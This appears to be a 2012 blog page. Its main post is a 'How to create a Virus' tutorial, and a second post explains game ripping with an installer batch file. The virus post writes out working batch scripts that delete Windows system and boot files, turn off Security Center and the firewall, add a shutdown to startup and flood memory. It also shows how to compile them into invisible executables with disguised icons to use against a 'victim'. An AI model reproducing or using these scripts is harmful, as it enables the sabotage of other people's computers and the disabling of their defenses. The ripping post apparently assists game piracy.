Tuesday 17 July 2012

How to create a Virus!!!!

Creation Of Basic Virus:
(For Educational Purpose only)

Virus is nothing just a computer program when it runs it will mess up the victim's system. Its very easy to create a Virus or say a Basic Virus. Basically a batch file calling any process in infinite loop can be virus as it put very high load on system memory. All you need is just a little knowledge of batch programming language and these software application named below:

1. Bat to Exe Convertor
2. Icon Changer

when you have all this you are eligible to make a computer virus, all you have to do is follow this steps:

Steps for a Basic Virus:

1. Open Notepad and write this code:


@echo off
Del c:\WINDOWS\system32
Del c:\WINDOWS\pchealth


2. after this save this file as MyFile.bat and DO NOT RUN IT!!

This file will delete System32 and pchealth folders in windows directory, which is really a mess for victim to recover after execution of this file, he has to Reinstall his operating system..



Steps for a Virus which show messages:

1. Open Notepad, and write this code:


WScript.Echo ("enter your message")

write this many times as you wants.

2. Save this file as message.vbs, after this in another notepad and write this code:

@echo off
call message.vbs
shutdown -s -t 030 -c "your own little message"

save this file as virus.bat.

3. Now run Bat to Exe Convertor.

4. Now select your batch file and then include message.vbs file and press compile.



5. Your Exe file is created you can also change icon of this file using icon changer. DO NOT RUN IT!!

This executable file after execution first shows you messages you write in your .vbs file and then shutdown the pc in 30 seconds as mentioned above. This virus does not harm anybody's system.



Steps to create a virus that cannot be detected!!

1. Open Notepad, and write this code:

@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
echo shutdown -s >> "%systemdrive%\documents and settings\start menu\programs\startup\virus.bat"
:virus
start cmd.exe
start command.com
start mspaint.exe
goto :virus


save the file as virus.bat.

2. Now run Bat to Exe convertor.

3. Now select Virus.bat file and check the Invisible application and press Compile.



4. Your Virus.exe created, which will not be detected and after click on this user will not even know whether that file is running or not. DO NOT RUN IT!!

After execution of this file, it will stop security center, firewall etc and then it will start cmd.exe and mspainte.exe infinitely which will eat memory of victim's system.




Steps to create an extremely dangerous virus:

1. Open Notepad, and write this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save file as Virus.bat.

2. Now convert it to exe file via bat to exe convertor.

3. You can change it icon using icon changer.

DO NOT RUN IT EXTREMELY DANGEROUS FOR NOOBS!!

when this file executed it will delete autoexec.bat, boot.ini, ntldr and win.ini, and the Victim's computer becomes unbootable and show this at boot this only be solve by reinstalling the operating system...



all these viruses are tested by me on my virtual OS!!

NOTE:
Do not run any of these virus on your pc, if you did, i'm not responsible for any harm to your system..

i'll be back with some more updates!!!


Source : INTERNET

Saturday 7 July 2012

Game Ripping Tutorial

Game Ripping Tutorial:

Ripping of any game is very easy though if you have softwares required for ripping.Ripping is just compressing a installed game with removing some unimportant files which are not so much important for the game, by removing them the will wok as it work before. Most of us play ripped game by skullptura, he/she/they use best method of ripping the game and then they achieve a better compression ratio, they use separate softwares for various files, such as uharc/free arc for data file compression, mp3 injectors for mp3 file compression, etc. Thats why they can make a 6 GB game in just 2GB or less. Which will reduce our download time also. For basic ripping you just need a best compression software, such Winrar, 7Zip,Uharc etc.

Steps for making a rip of game (For Educational purpose only):

1. Select a game you want to rip. Remove unimportant files such as language file(Except English), intro video files etc.

2. Run the game and see whether it works smoothly or not then goto step 3.

3. Compress the game files via any compressing utility i.e Winrar, Uharc, etc.(i use uharc here)

4. Main step of ripping is programming the batch file, open NOTEPAD and write this:

@echo off
echo.
echo *******************************
echo Ripped by
echo your name
echo *******************************
echo.
echo.
pause
cls
uharc x -o+ -vm+ -y+ "filename".uha //replace the filename with compressed file name
regedit /s "file".reg // replace file with registry filename
cls
echo success
echo.
echo enjoy the game
echo.
pause
cls
exit

After writing this in NOTEPAD save file as “Install.bat” in the folder where the compressed file is saved.


5. Another thing is to copy Uharc.exe in that folder form c:\program file\uharcgui or winuharc




Your basic game Rip is completed, you can test it by installing it.

These are some basics of ripping, we just have to do a little more for better ripping and results!!

Optional Step : You can use bik convertor and editor to edit the video file in your game and put your team name, your sign!!

Links to some required softwares:

Winrar

WinUharc

UharcGUI

Comments if you are facing any problem!!


Source: Internet